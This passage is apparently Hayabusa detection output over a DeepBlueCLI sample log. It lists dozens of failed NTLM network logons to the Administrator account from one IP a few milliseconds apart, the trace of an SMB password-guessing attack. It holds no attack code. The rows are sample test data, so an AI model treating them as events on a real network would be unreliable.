192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8qtzwuGJfQG4XB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: auOf2GwkoymLh4bC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YcMYQ4sA2GfMwCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YL1iM6WUtZIjIoTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7ruxdEGdeP3RLqF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.096 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZFXBpUJzafGYIggt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MC1K9nNLupH0NuSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rVfBLm10US9II19 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SBhAVHHtR7lZ1C3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKuUH8lMELYHibxF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UytgJLBtGRMCf3ar | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yno9399gUI2oBr4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbsqE98qy27Sp0UJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RjXtDnXvCXSJ2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EdRXJJ1RCl8n9bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tnwGNp2ncfcBlFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.608 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iGKEloPpd6CtrSlg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBvHz5iKl0dl97xj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0FPIXCc5FlKMLaL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c7Li2NqHgSIetZka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MuIRFiXBUqrJeMbx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zxJNU05FkPwhcYxj | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TWifHaaBiypAGkKi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9VByeO8vHGSOJK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ns12T94itDDRxYxC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8jplFaHgwrWpFY8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ9L626fGZQkNC25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.045 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HfplQ16d7lsObzki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c30ILHx5sYZCMflg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GMsJKiYmbgbr9wF0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2hpQI6z68MVBzoW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDgzJjXBnWDSVjdg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0XU5HdsnM0Lvpvq2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjmtkv6JDb4s2WnR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6mBM2WMWlKkQHZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3jo7coI8uS8JCorc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ao6QcPI3nzpNnHi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WkP8vstCEOH9wnUW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.484 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzrhcYEue85zhZ8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ivpdjGaxoZOCTxbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIsZXHE4Swkbytiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bdT2bVjtEd6KhQWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RT9Tqp0lf0dd6h9C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xwhlrl2ck1o2qTDy | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxX2762Fa804981t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O55rRqTo9vgwnYoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zo7BzxXZDdykOXoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6YGEMcvYtwNJys39 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0xq8et2LwWSgVgk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.956 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43EK0cGlZBhWRd5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UBoGMdTjWVVVvifn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcCrPXp3VLObGU6v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zhZguuPimqAruiTu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o6amdSWFFbueCyp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0wRaNXdhMlIY1HX | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J8jqrrwWeKZGypW0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LIavw2zakOP4DqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qz7gr4vA633waQ01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2TmHz5POLSNJHm2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DcpOxhy2nnLIEGHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.453 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gJxfDgfujy5Um2wa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 217VTq8EbYIDeSXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPfE1m0tsJAJnRt9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OQCfGhvBMSq3PIoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XBl6JIRetWEnjaVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXJMNnj4LeBIYARt | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3sdn9f4xtvcsaHp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DWT0NepMYD29cOwh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DDb7wV6uzj1tat2d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RBcmANUL4a6DFobS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL2swHF9MtnCfnp3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.883 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0ZkcAD0IakqSUph | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5HgksdIGukmliZeE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYoLckmmOWCSf4Q2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.000 